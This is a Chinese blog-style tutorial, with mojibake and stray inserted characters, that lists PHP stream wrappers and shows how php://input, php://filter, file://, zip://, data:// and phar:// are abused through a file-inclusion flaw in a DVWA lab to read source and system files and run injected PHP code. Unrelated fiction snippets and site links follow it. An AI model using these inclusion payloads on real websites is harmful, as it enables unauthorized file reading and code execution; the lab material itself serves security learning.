php偽協(xié)議小結[web安全]

PHP偽協(xié)議:

協(xié)議 功能
file:// 訪問本地文件设拟,需要絕對路徑
http:// 訪問http/https
ftp:// 訪問ftp
zlib:// 壓縮流
data:// 數(shù)據(jù)(RFC 2397)
glob:// 查找匹配的文件路徑模式
phar:// php歸檔
ssh2::// secure shell 2
rar:// RAR
ogg:// 音頻流
expect:// 處理式交互流
php:// 訪問各個輸入/輸出流

部分協(xié)議會受到配置文件中allow_url_fopen和allow_url_include所影響
偽協(xié)議在攻防中锭沟,通常被文件包含漏洞或者xxe所利用

php://
不受allow_url_fopen影響
php://input茴晋、php://stdinphp://memory拾氓、php://temp受allow_url_include影響

php://input
可以訪問POST的內容
當enctype="multipart/from-data"時呐萨,php://input無效
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=php://input
post提交<?php phpinfo()?>


php://filter
php://filter可以讀寫文件
在文件包含頁面讀取源碼:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php
讀出的源碼經(jīng)過了base64編碼酱鸭,不經(jīng)過base64編碼的話會直接執(zhí)行

file://
不受allow_url_fopen和allow_url_include影響
使用方法: file://+[文件絕對路徑]
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=file://c:/windows/win.ini

成功讀取到win.ini的內容

zip://、bzip://垛吗、zlib://
不受allow_url_fopen和allow_url_include影響
使用方法:zip://[壓縮包絕對路徑]#[壓縮包文件的子文件名]
寫入<?php phpinfo();?>到1.txt并壓縮到c://1.zip
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=zip://c:/1.zip%231.txt (這里我用#號會報錯凹髓,所以使用了%23)

data://
受allow_url_fopen和allow_url_include影響
可以利用該協(xié)議執(zhí)行代碼
page=data://text/plain,<?php phpinfo()?>
如果有符號被過濾可以試試base64編碼page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://
寫入<?php phpinfo();?>到1.txt并壓縮到c://1.zip,改后綴名為1.jpg
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=phar://c:/1.jpg/1.txt


可以看到這樣也可以執(zhí)行php代碼

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末怯屉,一起剝皮案震驚了整個濱河市蔚舀,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌锨络,老刑警劉巖赌躺,帶你破解...
    沈念sama閱讀 217,406評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異羡儿,居然都是意外死亡礼患,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評論 3 393
  • 文/潘曉璐 我一進店門掠归,熙熙樓的掌柜王于貴愁眉苦臉地迎上來缅叠,“玉大人,你說我怎么就攤上這事虏冻》袅唬” “怎么了?”我有些...
    開封第一講書人閱讀 163,711評論 0 353
  • 文/不壞的土叔 我叫張陵厨相,是天一觀的道長领曼。 經(jīng)常有香客問我鸥鹉,道長,這世上最難降的妖魔是什么庶骄? 我笑而不...
    開封第一講書人閱讀 58,380評論 1 293
  • 正文 為了忘掉前任毁渗,我火速辦了婚禮,結果婚禮上单刁,老公的妹妹穿的比我還像新娘祝蝠。我一直安慰自己,他們只是感情好幻碱,可當我...
    茶點故事閱讀 67,432評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著细溅,像睡著了一般褥傍。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上喇聊,一...
    開封第一講書人閱讀 51,301評論 1 301
  • 那天恍风,我揣著相機與錄音,去河邊找鬼誓篱。 笑死朋贬,一個胖子當著我的面吹牛,可吹牛的內容都是我干的窜骄。 我是一名探鬼主播锦募,決...
    沈念sama閱讀 40,145評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼邻遏!你這毒婦竟也來了糠亩?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,008評論 0 276
  • 序言:老撾萬榮一對情侶失蹤准验,失蹤者是張志新(化名)和其女友劉穎赎线,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體糊饱,經(jīng)...
    沈念sama閱讀 45,443評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡垂寥,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,649評論 3 334
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了另锋。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片滞项。...
    茶點故事閱讀 39,795評論 1 347
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖夭坪,靈堂內的尸體忽然破棺而出蓖扑,到底是詐尸還是另有隱情,我是刑警寧澤台舱,帶...
    沈念sama閱讀 35,501評論 5 345
  • 正文 年R本政府宣布律杠,位于F島的核電站潭流,受9級特大地震影響,放射性物質發(fā)生泄漏柜去。R本人自食惡果不足惜灰嫉,卻給世界環(huán)境...
    茶點故事閱讀 41,119評論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望嗓奢。 院中可真熱鬧讼撒,春花似錦、人聲如沸股耽。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,731評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽物蝙。三九已至炎滞,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間诬乞,已是汗流浹背册赛。 一陣腳步聲響...
    開封第一講書人閱讀 32,865評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留震嫉,地道東北人森瘪。 一個月前我還...
    沈念sama閱讀 47,899評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像票堵,于是被迫代替她去往敵國和親扼睬。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,724評論 2 354

推薦閱讀更多精彩內容

  • 文件包含 程序開發(fā)人員一般會把重復使用的函數(shù)寫到單個文件中悴势,需要使用某個函數(shù)時直接調用此文件痰驱,而無需再次編寫,這中...
    二潘閱讀 8,278評論 2 4
  • 文檔:http://www.freebuf.com/articles/web/119150.html File I...
    BerL1n閱讀 2,876評論 0 2
  • DVWA-1.9系列一共分為10個功能模塊: Brute Force(暴力破解) Command Injectio...
    網(wǎng)絡安全自修室閱讀 1,357評論 0 0
  • 1瞳浦、備份 2担映、下載新的CentOS-Base.repo 到/etc/yum.repos.d/ 3、之后運行yum ...
    sa_justin閱讀 199評論 0 0
  • //勢之中// 沒方向的風 一個勁兒狂刮 老枝舊葉 模樣晃到浮夸 鳥兒也拼命嘰喳 沙千顆 塵萬粒 齊涌向空中 似千...
    單想閱讀 95評論 0 1